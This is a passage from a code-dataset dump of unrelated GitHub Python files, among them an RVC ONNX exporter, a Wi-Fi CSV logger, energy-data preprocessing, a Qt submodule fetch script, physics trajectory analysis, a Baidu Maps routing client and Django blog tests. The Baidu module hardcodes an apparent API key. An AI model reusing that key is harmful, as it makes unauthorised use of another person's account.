RVC model (optional).\n hubert_path: Path to the original Hubert model (default: \"./models/hubert_base\").\n f0_method: F0 extraction method, \"pm\" or \"harvest\" (default: \"pm\").\n unsafe: Set to True to load untrusted models (default: False).\n safe_serialization: Set to False to disable safe serialization (default: True).\n \"\"\"\n\n if save_directory is None:\n p = Path(vits_path)\n save_directory = p.parent / p.stem\n\n if Path(hubert_path).is_file():\n fairseq_hubert = load_fairseq_hubert(str(hubert_path), unsafe)\n hubert_config = extract_hubert_config(fairseq_hubert)\n hubert_state = extract_hubert_state(hubert_config, fairseq_hubert)\n else:\n hubert_config = HubertConfig.from_pretrained(hubert_path)\n hubert_model = HubertForCTC.from_pretrained(hubert_path)\n assert isinstance(hubert_model, HubertForCTC)\n hubert_state = hubert_model.state_dict()\n\n assert isinstance(hubert_config, HubertConfig)\n\n if Path(vits_path).is_file():\n vits_checkpoint = load_vits_checkpoint(vits_path)\n vits_config = extract_vits_config(vits_checkpoint)\n vits_state = extract_vits_state(vits_checkpoint)\n vits_strict = False\n else:\n vits_config = SynthesizerTrnMs256NSFsidConfig.from_pretrained(vits_path)\n assert isinstance(vits_config, SynthesizerTrnMs256NSFsidConfig)\n vits = SynthesizerTrnMs256NSFsid.from_pretrained(vits_path)\n assert isinstance(vits, SynthesizerTrnMs256NSFsid)\n vits_state = vits.state_dict()\n vits_strict = True\n\n model = RVCModel(\n RVCConfig(\n hubert=hubert_config,\n vits=vits_config,\n )\n )\n\n # load state\n model.hubert.load_state_dict(hubert_state)\n model.vits.load_state_dict(vits_state, strict=vits_strict)\n\n model.eval()\n model.to(\"cpu\")\n\n dummy_input_values = torch.randn(1, 16000, dtype=torch.float32)\n dummy_f0_coarse = torch.zeros(1, 100, dtype=torch.int32)\n dummy_f0 = torch.randn(1, 100, dtype=torch.float32)\n\n # export\n torch.onnx.export(\n model,\n (dummy_input_values, dummy_f0_coarse, dummy_f0),\n output_path,\n opset_version=15,\n input_names=[\"input_values\", \"f0_coarse\", \"f0\"],\n output_names=[\"output\"],\n dynamic_axes={\n \"input_values\": {0: \"batch\", 1: \"sequence\"},\n \"f0_coarse\": {0: \"batch\", 1: \"sequence\"},\n \"f0\": {0: \"batch\", 1: \"sequence\"},\n \"output\": {0: \"batch\", 1: \"sequence\"},\n },\n )\n\n return model\n\n\nif __name__ == \"__main__\":\n from argh import ArghParser\n\n parser = ArghParser()\n parser.set_default_command(export_onnx)\n parser.dispatch()\n","repo_name":"ogukei/simple-rvc","sub_path":"hf-rvc/hf_rvc/tools/export_onnx.py","file_name":"export_onnx.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"2338970285","text":"import csv\nimport logging\n\nfrom datetime import datetime\n\nlog = logging.getLogger(\"wifininja.fileLib\")\n\nWLC_HEADINGS = [\n \"date\", \"time\", \"clients-now\", \"lan-interface\",\n \"in-bytes\", \"out-bytes\", \"in-discards\", \"in-discards-64\",\n \"in-unknown-protos\", \"in-unknown-protos-64\", \"out-discards\", \"per-phy\", \"top-os\"\n]\n\nAP_HEADINGS = [\n \"date\", \"time\", \"ap-name\", \"radio-mac\", \"eth-mac\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\"\n]\n\n\nclass InitCsv():\n\n def __init__(self):\n\n self.path = \"./logs/\"\n self.stamp = str(datetime.now())[:-7].replace(':', \"-\").replace(\" \", \"_\")\n self.wlc_filename = f\"{self.path}{self.stamp}_WLC.csv\"\n self.ap_filename = f\"{self.path}{self.stamp}_AP.csv\"\n\n write_csv(self.wlc_filename, WLC_HEADINGS)\n write_csv(self.ap_filename, AP_HEADINGS)\n\n\ndef date_time():\n\n dt = []\n stamp = str(datetime.now())[:-7]\n dt.append(stamp.split()[0])\n dt.append(stamp.split()[1])\n\n return dt\n\n\ndef write_csv(filename, row):\n\n try:\n with open(filename, \"a\") as csvfile:\n csvwriter = csv.writer(csvfile, lineterminator=\"\\n\", delimiter=\",\")\n csvwriter.writerow(row)\n except PermissionError:\n log.error(f\"Unable to append CSV\")\n\n\ndef send_to_csv_wlc(wlc_dict):\n\n row_data = date_time()\n try:\n row_data.append(wlc_dict[\"all-clients\"])\n row_data.append(wlc_dict[\"lan-interface\"])\n row_data.append(wlc_dict[\"in-bytes\"])\n row_data.append(wlc_dict[\"out-bytes\"])\n row_data.append(wlc_dict[\"in-discards\"])\n row_data.append(wlc_dict[\"in-discards-64\"])\n row_data.append(wlc_dict[\"in-unknown-protos\"])\n row_data.append(wlc_dict[\"in-unknown-protos-64\"])\n row_data.append(wlc_dict[\"out-discards\"])\n try:\n row_data.append(wlc_dict[\"per-phy\"])\n except KeyError: #append blank cell when no client data exists e.g. 0 clients\n row_data.append(\"\")\n try:\n row_data.append(wlc_dict[\"top-os\"])\n except KeyError: #append blank cell when no client data exists e.g. 0 clients\n row_data.append(\"\")\n\n except KeyError:\n log.warning(f\"WLC data incomplete. Not writing to CSV\")\n else:\n write_csv(init.wlc_filename, row_data)\n\n\ndef send_to_csv_ap(ap_dict):\n\n dt = date_time()\n for ap_mac, ap_data in ap_dict.items():\n row_data = []\n row_data.append(dt[0])\n row_data.append(dt[1])\n try:\n row_data.append(ap_data[\"ap_name\"])\n row_data.append(ap_mac)\n row_data.append(ap_data[\"eth_mac\"])\n for slot in range(0, ap_data[\"slot-count\"]):\n slot = str(slot)\n row_data.append(f\"SLOT {slot}\")\n try:\n row_data.append(ap_data[slot][\"state\"])\n row_data.append(ap_data[slot][\"mode\"])\n row_data.append(ap_data[slot][\"band\"])\n row_data.append(ap_data[slot][\"channel\"])\n row_data.append(ap_data[slot][\"width\"])\n row_data.append(ap_data[slot][\"stations\"])\n row_data.append(ap_data[slot][\"ch_util\"])\n row_data.append(ap_data[slot][\"ch_changes\"])\n except KeyError:\n row_data = row_data + [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"]\n log.info(f\"No data for {ap_data['ap_name']} slot {slot}\") \n \n except KeyError:\n log.warning(f\"AP data incomplete. Not writing to CSV\")\n else:\n write_csv(init.ap_filename, row_data)\n\n\ninit = InitCsv()","repo_name":"Johnny8Bit/wifi-dashboard","sub_path":"libs/fileLib.py","file_name":"fileLib.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38597665841","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Data Challenge : Historical consumption regression for electricity supply pricing\n\n# # This module helps the pre-processing automation of our data set. It includes all the function needed to deal\n# with missing values, adding features, normalisation and handling data type.\n\n# # # Importing\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n# local import\nfrom .util import need\n\n\n# See the other notebook for data preprocessing details and visualisation\n\n# In[2]:\n\nclass Data:\n '''\n The aim of this class is to help applying different preprocessing function to our dataset.\n we begin by cleaning our data set, removing useless features then adding more features.\n The last two methods splits the data for the lwo locations.\n '''\n\n def __init__(self, data_train, data_test, y_data):\n self.data_train = data_train\n self.data_test = data_test\n self.y_data = y_data\n\n def data_preprocessing(self):\n # Remove useless features\n self.data_train = self.data_train.drop([\"loc_1\",\n \"loc_2\",\n \"loc_secondary_1\",\n \"loc_secondary_2\",\n \"loc_secondary_3\"],\n axis=1)\n self.data_test = self.data_test.drop([\"loc_1\",\n \"loc_2\",\n \"loc_secondary_1\",\n \"loc_secondary_2\",\n \"loc_secondary_3\"],\n axis=1)\n # add is holiday feature \n need.is_holiday(self.data_train)\n need.is_holiday(self.data_test)\n\n # convert to timestamp \n self.data_train.timestamp = pd.to_datetime(self.data_train.timestamp)\n self.data_test.timestamp = pd.to_datetime(self.data_test.timestamp)\n\n # indexing with timestamp\n self.data_test = self.data_test.set_index('timestamp')\n self.data_train = self.data_train.set_index('timestamp')\n\n # add time features\n need.time_features(self.data_train)\n need.time_features(self.data_test)\n\n # add is weekend feature\n need.is_weekend(self.data_train)\n need.is_weekend(self.data_test)\n\n # add smoothing for temp and humidity\n self.data_train['temp_1_smooth7D'] = self.data_train['temp_1'].interpolate().rolling(24 * 7).mean().fillna(\n method='bfill').round(decimals=1)\n self.data_train['temp_2_smooth7D'] = self.data_train['temp_2'].interpolate().rolling(24 * 7).mean().fillna(\n method='bfill').round(decimals=1)\n self.data_test['temp_1_smooth7D'] = self.data_test['temp_1'].interpolate().rolling(24 * 7).mean().fillna(\n method='bfill').round(decimals=1)\n self.data_test['temp_2_smooth7D'] = self.data_test['temp_2'].interpolate().rolling(24 * 7).mean().fillna(\n method='bfill').round(decimals=1)\n\n self.data_train['humidity_1_smooth7D'] = self.data_train['humidity_1'].interpolate().rolling(\n 24 * 7).mean().fillna(method='bfill').round()\n self.data_train['humidity_2_smooth7D'] = self.data_train['humidity_2'].interpolate().rolling(\n 24 * 7).mean().fillna(method='bfill').round()\n self.data_test['humidity_1_smooth7D'] = self.data_test['humidity_1'].interpolate().rolling(\n 24 * 7).mean().fillna(method='bfill').round()\n self.data_test['humidity_2_smooth7D'] = self.data_test['humidity_2'].interpolate().rolling(\n 24 * 7).mean().fillna(method='bfill').round()\n\n # Normalising data\n scaler = MinMaxScaler()\n self.data_train[['temp_1', 'temp_2',\n 'mean_national_temp',\n 'humidity_1', 'humidity_2',\n 'consumption_secondary_1',\n 'consumption_secondary_2',\n 'consumption_secondary_3',\n 'temp_1_smooth7D',\n 'temp_2_smooth7D',\n 'humidity_1_smooth7D',\n 'humidity_2_smooth7D']] = scaler.fit_transform(self.data_train[['temp_1', 'temp_2',\n 'mean_national_temp',\n 'humidity_1', 'humidity_2',\n 'consumption_secondary_1',\n 'consumption_secondary_2',\n 'consumption_secondary_3',\n 'temp_1_smooth7D',\n 'temp_2_smooth7D',\n 'humidity_1_smooth7D',\n 'humidity_2_smooth7D']])\n self.data_train = self.data_train.interpolate()\n self.data_test[['temp_1', 'temp_2',\n 'mean_national_temp',\n 'humidity_1', 'humidity_2',\n 'consumption_secondary_1',\n 'consumption_secondary_2',\n 'consumption_secondary_3',\n 'temp_1_smooth7D',\n 'temp_2_smooth7D',\n 'humidity_1_smooth7D',\n 'humidity_2_smooth7D']] = scaler.fit_transform(self.data_test[['temp_1', 'temp_2',\n 'mean_national_temp',\n 'humidity_1', 'humidity_2',\n 'consumption_secondary_1',\n 'consumption_secondary_2',\n 'consumption_secondary_3',\n 'temp_1_smooth7D',\n 'temp_2_smooth7D',\n 'humidity_1_smooth7D',\n 'humidity_2_smooth7D']])\n self.data_test = self.data_test.interpolate()\n\n def get_data_split(self):\n # split data train and test of the two sites\n x_train1 = self.data_train.drop(['temp_2',\n 'humidity_2',\n 'temp_2_smooth7D',\n 'humidity_2_smooth7D'],\n axis=1)\n\n x_train2 = self.data_train.drop(['temp_1',\n 'humidity_1',\n 'temp_1_smooth7D',\n 'humidity_1_smooth7D'],\n axis=1)\n\n x_test1 = self.data_test.drop(['temp_2',\n 'humidity_2',\n 'temp_2_smooth7D',\n 'humidity_2_smooth7D'], axis=1)\n\n x_test2 = self.data_test.drop(['temp_1',\n 'humidity_1',\n 'temp_1_smooth7D',\n 'humidity_1_smooth7D'], axis=1)\n\n return x_train1, x_train2, x_test1, x_test2\n\n def get_split_y_data(self):\n # split the data target of the two sites\n self.y_data = self.y_data.set_index(self.data_train.index)\n\n y_train1 = self.y_data['consumption_1']\n y_train2 = self.y_data['consumption_2']\n\n return y_train1, y_train2\n","repo_name":"aitsi/Time_series_project_on_historical_consumption_regression","sub_path":"Notebooks/model/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42485713882","text":"#!/usr/bin/env python\n\n\"\"\"Set up upstream remote in each submodule and fetch.\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport subprocess\nimport sys\n\n# Prevent .pyc file generation\nsys.dont_write_bytecode = True\n\nlogger = logging.getLogger(__name__)\nscript_dir = os.path.dirname(os.path.abspath(__file__))\n\ndef split_and_log(string, log_level=logging.DEBUG):\n for line in iter(string.splitlines()):\n line = line.rstrip()\n if line:\n logger.log(log_level, line)\n\ndef call(args, **kwargs):\n try:\n p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs)\n stdout, _ = p.communicate()\n split_and_log(stdout)\n return (0 == p.returncode)\n except (OSError, subprocess.CalledProcessError) as exception:\n logger.error('Subprocess failed. Exception: ' + str(exception))\n return False\n except:\n logger.error('Subprocess failed. Unknown exception.')\n return False\n\ndef parse_args(args):\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument(\"--log-level\", type=str, default=\"INFO\", choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"], help=\"Desired console log level\")\n\n args = parser.parse_args(args)\n return args\n\ndef run(args):\n logging.basicConfig(level=args.log_level, format='%(levelname)-8s %(message)s')\n\n submodule_prefix = \"qt\"\n submodule_prefix_length = len(submodule_prefix)\n for file_name in os.listdir(script_dir):\n submodule_dir = os.path.join(script_dir, file_name)\n if os.path.isdir(submodule_dir):\n if file_name[:submodule_prefix_length] == submodule_prefix:\n if len(os.listdir(submodule_dir)) == 0:\n continue\n\n submodule = file_name\n\n # Ignore failure here if the upstream remote was already set\n call([\"git\", \"remote\", \"add\", \"upstream\", \"https://code.qt.io/qt/%s.git\" % submodule], cwd=submodule_dir)\n\n if not call([\"git\", \"fetch\", \"upstream\"], cwd=submodule_dir):\n logger.error(\"Could not fetch \\\"upstream\\\" for submodule \\\"%s\\\".\" % submodule)\n continue\n\n logger.info(\"Fetched upstream for submodule \\\"%s\\\".\" % submodule)\n\n return 0\n\nif __name__ == '__main__':\n sys.exit(run(parse_args(sys.argv[1:])))\n","repo_name":"cycollins/tqtc-qt5","sub_path":"st_submodules_fetch.py","file_name":"st_submodules_fetch.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41068950062","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport models as m\n\n\ndef read_pos_sur(infolder):\n filenames = [f for f in os.listdir(\n infolder) if os.path.isfile(os.path.join(infolder, f))]\n files = [infolder + f for f in filenames]\n positions = []\n surfaces = []\n for file in files:\n try:\n with open(file, \"r\") as f:\n lines = f.readlines()\n pos = np.zeros(len(lines))\n sur = np.zeros(len(lines))\n for i in range(len(lines)):\n line = lines[i]\n arr = line.split(\",\")\n pos[i] = float(arr[0][:-1])\n sur[i] = int(arr[-1][:-1])\n positions.append(pos)\n surfaces.append(sur)\n except:\n print(\"Bad csv: \", file)\n\n return positions, surfaces\n\n\ndef plot_trajectories(ax, m, infolder):\n positions, surfaces = read_pos_sur(infolder)\n\n for i in range(len(positions)):\n pos = positions[i]\n sur = surfaces[i]\n energies = np.zeros(len(pos))\n for j in range(len(pos)):\n energies[j] = m.get_adiabatic_energy(pos[j])[int(sur[j])]\n\n ax.plot(pos, energies)\n\n\ndef avg_trajectories(ax, m, infolder):\n positions, surfaces = read_pos_sur(infolder)\n energies = []\n for i in range(len(positions)):\n pos = positions[i]\n sur = surfaces[i]\n en = np.zeros(len(pos))\n for j in range(len(pos)):\n en[j] = m.get_adiabatic_energy(pos[j])[int(sur[j])]\n energies.append(en)\n\n max_len = len(max(positions, key=lambda x: len(x)))\n for i in range(len(positions)):\n l = len(positions[i])\n if l < max_len:\n positions[i] = np.concatenate((\n positions[i], np.zeros(max_len - l) + positions[i][-1]))\n energies[i] = np.concatenate(\n (energies[i], np.zeros(max_len - l) + energies[i][-1]))\n\n p_avg = np.zeros(max_len)\n e_avg = np.zeros(max_len)\n for i in range(len(positions)):\n p_avg += positions[i]\n e_avg += energies[i]\n\n p_avg /= len(positions)\n e_avg /= len(positions)\n\n ax.plot(p_avg, e_avg)\n\n\ndef outfile_analysis(outfile):\n with open(outfile, \"r\") as f:\n end_states = []\n end_times = []\n for l in f.readlines():\n if \"end state:\" in l.lower():\n end_states.append(int(l.rstrip()[-1]))\n elif \"end time:\" in l.lower():\n end_times.append(int(l.split(\":\")[1].rstrip()))\n\n print(\"Avg end state: \", sum(end_states)/len(end_states))\n print(\"Avg end time: \", sum(end_times)/len(end_times))\n\n\ndef time_spent(infolder, x_split=0):\n positions, surfaces = read_pos_sur(infolder)\n left_count = 0\n right_count = 0\n state_counts = {}\n for i in range(len(positions)):\n pos = positions[i]\n sur = surfaces[i]\n l = len(pos)\n left = sum(np.less(pos, np.zeros(l) + x_split))\n right = l - left\n left_count += left\n right_count += right\n for s in sur:\n if s in state_counts.keys():\n state_counts[s] += 1\n else:\n state_counts[s] = 1\n\n tot = left_count + right_count\n print(\"left: \", left_count/tot)\n print(\"right: \", right_count/tot)\n\n s_counts = np.array(list(state_counts.values()))\n print(\"state counts: \", s_counts/sum(s_counts))\n\n\ndef traj():\n fig, ax = plt.subplots()\n ax.set_ylabel('Potential (Eh)')\n ax.set_xlabel('Nuclear coordinate (a.u.)')\n model = m.NState_Spin_Boson(l_states=10, r_states=10)\n x = np.linspace(-20, 20, 1000)\n m.plot_1d(ax, model, x)\n # plot_trajectories(ax, model, \"results/Nstate_063021/verbose/\")\n avg_trajectories(ax, model, \"results/Nstate_063021/verbose/\")\n plt.show()\n\n\ndef tully_props(ax1, ax2, ax3, infolder, k_arr):\n filenames = [f\"{k}.out\" for k in k_arr]\n files = [infolder + f for f in filenames]\n\n dat = {}\n\n for i in range(len(files)):\n filename = files[i]\n k = k_arr[i]\n state0_reflected = 0\n state0_transmitted = 0\n state1_transmitted = 0\n with open(filename, \"r\") as f:\n lines = f.readlines()\n end_pos = None\n end_state = None\n for line in lines:\n if \"end position:\" in line.lower():\n if end_pos is not None:\n if end_pos > 0 and end_state == 0:\n state0_transmitted += 1\n elif end_pos > 0 and end_state == 1:\n state1_transmitted += 1\n else:\n state0_reflected += 1\n\n end_pos = float(line.split(\"[\")[1].rstrip()[:-1])\n elif \"end state:\" in line.lower():\n end_state = int(line.split(\":\")[1].rstrip()[-1])\n\n tot = state0_reflected + state0_transmitted + state1_transmitted\n state0_transmitted /= tot\n state0_reflected /= tot\n state1_transmitted /= tot\n\n dat[k] = (state0_transmitted, state0_reflected, state1_transmitted)\n\n s0_t = np.array([dat[k][0] for k in k_arr])\n s0_r = np.array([dat[k][1] for k in k_arr])\n s1_t = np.array([dat[k][2] for k in k_arr])\n\n ax1.plot(k_arr, s0_t)\n ax2.plot(k_arr, s0_r)\n ax3.plot(k_arr, s1_t)\n\n\ndef filter_finished(d):\n finished_trajs = []\n filenames = [f for f in os.listdir(d) if f.endswith(\".tmp\")]\n for f in filenames:\n i = int(f.split(\".\")[0])\n finished_trajs.append(i)\n for f in os.listdir(d + \"verbose/\"):\n if not int(f.split(\".\")[0]) in finished_trajs:\n os.remove(d + \"verbose/\" + f)\n\n\ndef plot_end_pos(outfile, m, ax):\n with open(outfile, \"r\") as f:\n end_pos = []\n end_state = []\n for l in f.readlines():\n if \"end position:\" in l.lower():\n end_pos.append(float(l.split(\"[\")[1].rstrip()[:-1]))\n elif \"end state:\" in l.lower():\n end_state.append(int(l.split(\":\")[1].rstrip()[-1]))\n\n end_pos = np.array(end_pos)\n end_state = np.array(end_state)\n\n for i in range(len(end_pos)):\n pos = end_pos[i]\n sur = end_state[i]\n energy = m.get_adiabatic_energy(pos)[sur]\n ax.plot(pos, energy, 'ro')\n\n\ndef combine_tmp(d, outfile):\n filenames = [f for f in os.listdir(d) if f.endswith(\".tmp\")]\n for filename in filenames:\n with open(d + outfile, \"a\") as out, open(d + filename) as infile:\n out.writelines(infile.readlines())\n\n\ndef del_tmp(d):\n filenames = [f for f in os.listdir(d) if f.endswith(\".tmp\")]\n for filename in filenames:\n os.remove(os.path.join(d, filename))\n\n\ndef prepare_unfinished_job(d, out):\n filter_finished(d)\n combine_tmp(d, out)\n del_tmp(d)\n\n# prepare_unfinished_job(\n# \"results/070821_Nstate_high_density/\", \"070821_high_d.out\")\n# outfile_analysis(\"results/Nstate_063021/063021.out\")\n# time_spent(\"./results/Nstate_063021/verbose/\")\n\n\nfig, ax = plt.subplots()\nax.set_xlabel(\"Nuclear coordinate (au)\")\nax.set_ylabel(\"Potential (Eh)\")\n# ax.set_title(\"iter=12500, damp=.0001, T=298\")\nx = np.linspace(-20, 20, 1000)\nmodel = m.NState_Spin_Boson(l_states=10, r_states=10)\nm.plot_diabats_1d(ax, model, x)\navg_trajectories(ax, model, \"results/070621_long_test/verbose/\")\n\nplot_end_pos(\"results/070621_long_test/070621.out\", model, ax)\nplt.show()\n","repo_name":"samrmay/afssh","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":7455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33411448060","text":"# -*- coding:utf-8 -*-\n\nimport requests\nimport sys\nfrom . import maps\napp_key = \"Nx80Sg2TOypzPcKRHz6P8TtE\"\n\n'''\nbaidu direction api doc: http://developer.baidu.com/map/index.php?title=webapi/direction-api\n'''\n\ndef GetRoutingByWalking(origin, destination, city): \n params = {\n 'mode': 'walking', 'ak': app_key, 'output': 'json',\n 'origin': '%s,%s' % origin,\n 'destination': '%s,%s' % destination,\n 'region': city,\n }\n return requests.get(\"http://api.map.baidu.com/direction/v1\", params = params).json()\ndef GetRoutingByDriving(origin, destination, city): \n params = {\n 'mode': 'driving', 'ak': app_key, 'output': 'json',\n 'origin': '%s,%s' % origin,\n 'destination': '%s,%s' % destination,\n 'region': city,\n }\n return requests.get(\"http://api.map.baidu.com/direction/v1\", params = params).json()\n \ndef GetRoutingByTransit(origin, destination, city):\n params = {\n 'mode': 'transit', 'ak': app_key, \n 'output': 'json', 'region': city,\n 'origin': '%s,%s' % origin, 'destination':'%s,%s' % destination,\n } \n return requests.get(\"http://api.map.baidu.com/direction/v1\", params = params).json()\n \ndef GetRoutingByTaxi(origin, destination, city):\n params = {\n 'mode': 'transit', 'ak': app_key, \n 'output': 'json', 'region': city,\n 'origin': '%s,%s' % origin, 'destination':'%s,%s' % destination,\n } \n resp = requests.get('http://api.map.baidu.com/direction/v1', params = params).json()\n if resp['status'] == 0:\n if resp['type'] == 1:\n resp['status'] = 400001\n resp['message'] = u'模糊的起始点,无法查询线路'\n elif resp['type'] == 2:\n resp['result'] = resp['result']['taxi']\n del resp['type']\n return resp\n \nif __name__ == '__main__':\n start = (30.270067,120.129649) #浙大玉泉校区\n end = (30.295812,120.217858) #杭州东站\n print(GetRoutingByTransit(start, end, u'杭州'))\n #print(GetRoutingByWalking(start, end, u'杭州'))","repo_name":"groverc85/Mobile-Assistant","sub_path":"moblife/apis/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18722676213","text":"\"\"\"\nGiven a non-negative integer represented as a non-empty array of digits,\nplus one to the integer.\n\nYou may assume the integer do not contain any leading zero,\nexcept the number 0 itself.\n\nThe digits are stored such that the most significant digit is\nat the head of the list.\n\"\"\"\n\n\nclass Solution(object):\n\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n current = sum([digits[i] * 10 ** (len(digits) - i - 1)\n for i in range(len(digits))]) + 1\n return [int(digit) for digit in str(current)]\n\n\ns = Solution()\ns.plusOne([1, 2, 3, 10900])\n","repo_name":"SamaelChen/machine-learning-practice-code","sub_path":"sp/leetcode/Plus_One.py","file_name":"Plus_One.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"68"} +{"seq_id":"27049057301","text":"import datetime\n\nfrom django.utils import timezone\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom blog.models import Post, Comment, Category, Author\nfrom polls.models import Question, Choice\n\n# Functions to create objects for the tests\ndef create_post(category, author, name, content, status):\n \"\"\"\n Creates a post with the given `category, author, name, content, status`.\n \"\"\"\n return Post.objects.create(category=category, author=author, name=name, content=content, status=status)\n\ndef create_comment(post, author, content):\n \"\"\"\n Creates a comment with the given `post, author, content`.\n \"\"\"\n return Comment.objects.create(post=post, author=author, content=content)\n\ndef create_category(name):\n \"\"\"\n Creates a category with the given `name`.\n \"\"\"\n return Category.objects.create(name=name)\n\ndef create_author(name):\n \"\"\"\n Creates an author with the given `name`.\n \"\"\"\n return Author.objects.create(name=name)\n\ndef create_question(question_text, days):\n \"\"\"\n Creates a question with the given `question_text` and published the\n given number of `days` offset to now (negative for questions published\n in the past, positive for questions that have yet to be published).\n \"\"\"\n time = timezone.now() + datetime.timedelta(days=days)\n return Question.objects.create(question_text=question_text, pub_date=time)\n\n#Sample tests\nclass HomeViewTests(TestCase):\n def test_home_view_with_a_published_post(self):\n \"\"\"\n Posts with the Published status should be displayed on the\n home page.\n \"\"\"\n category = create_category('Category 1')\n author = create_author('Author 1')\n create_post(category=category, author=author, name='Published Post', content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.', status='Published')\n create_question(question_text=\"Past question.\", days=-30)\n response = self.client.get(reverse('blog.home'))\n self.assertQuerysetEqual(\n response.context['posts'],\n ['']\n )\n\n def test_home_view_with_a_draft_post(self):\n \"\"\"\n Posts with the Draft status should not be displayed on the\n home page.\n \"\"\"\n category = create_category('Category 1')\n author = create_author('Author 1')\n create_post(category=category, author=author, name='Draft Post', content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.', status='Draft')\n create_question(question_text=\"Past question.\", days=-30)\n response = self.client.get(reverse('blog.home'))\n self.assertContains(response, \"No posts are available.\")\n self.assertQuerysetEqual(response.context['posts'], [])\n\n def test_home_view_with_draft_post_and_published_post(self):\n \"\"\"\n Even if both draft and published posts exist, only published posts\n should be displayed.\n \"\"\"\n category = create_category('Category 1')\n author = create_author('Author 1')\n create_post(category=category, author=author, name='Published Post',\n content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.',\n status='Published')\n create_post(category=category, author=author, name='Draft Post',\n content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.',\n status='Draft')\n create_question(question_text=\"Past question.\", days=-30)\n response = self.client.get(reverse('blog.home'))\n self.assertQuerysetEqual(\n response.context['posts'],\n ['']\n )\n\n def test_home_view_with_two_published_posts(self):\n \"\"\"\n The blog home page may display multiple posts.\n \"\"\"\n category = create_category('Category 1')\n author = create_author('Author 1')\n create_post(category=category, author=author, name='Published Post 1',\n content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.',\n status='Published')\n create_post(category=category, author=author, name='Published Post 2',\n content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.',\n status='Published')\n create_question(question_text=\"Past question.\", days=-30)\n response = self.client.get(reverse('blog.home'))\n self.assertQuerysetEqual(\n response.context['posts'],\n ['', '']\n )\n\nclass ShowPostViewTests(TestCase):\n def test_show_post_view_with_a_draft_post(self):\n \"\"\"\n The view of a post with a draft status should\n return a 404 not found.\n \"\"\"\n category = create_category('Category 1')\n author = create_author('Author 1')\n draft_post = create_post(category=category, author=author, name='Draft Post', content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.', status='Draft')\n url = reverse('blog.post', args=(draft_post.id,))\n create_question(question_text=\"Past question.\", days=-30)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 404)\n\n def test_show_post_view_with_a_published_post(self):\n \"\"\"\n The view of a post with a published status should\n display the post content.\n \"\"\"\n category = create_category('Category 1')\n author = create_author('Author 1')\n published_post = create_post(category=category, author=author, name='Published Post',\n content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.',\n status='Published')\n url = reverse('blog.post', args=(published_post.id,))\n create_question(question_text=\"Past question.\", days=-30)\n response = self.client.get(url)\n self.assertContains(response, published_post.content)","repo_name":"alinecrsouza/django-blog-app","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"73173033176","text":"#!/usr/bin/env pypy3\n\ndef ans(A, B):\n\tret = 0\n\tpos_match = min(A[2], B[1])\n\tA[2] -= pos_match\n\tB[1] -= pos_match\n\tret += 2*pos_match\n\n\tassert(sum(A) == sum(B))\n\tN = sum(A)\n\n\tx = B[2]\n\ty = A[1]\n\n\tneg_match = (x + y) - N\n\tif neg_match > 0:\n\t\tret -= 2*neg_match\n\n\treturn ret\n\nT = int(input())\nfor t in range(T):\n\tA = input().split()\n\tA = list(map(int, A))\n\n\tB = input().split()\n\tB = list(map(int, B))\n\n\tprint(ans(A, B))","repo_name":"ldct/cp","sub_path":"codeforces/665/B/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"23937230334","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 16 16:39:51 2022\n\n@author: 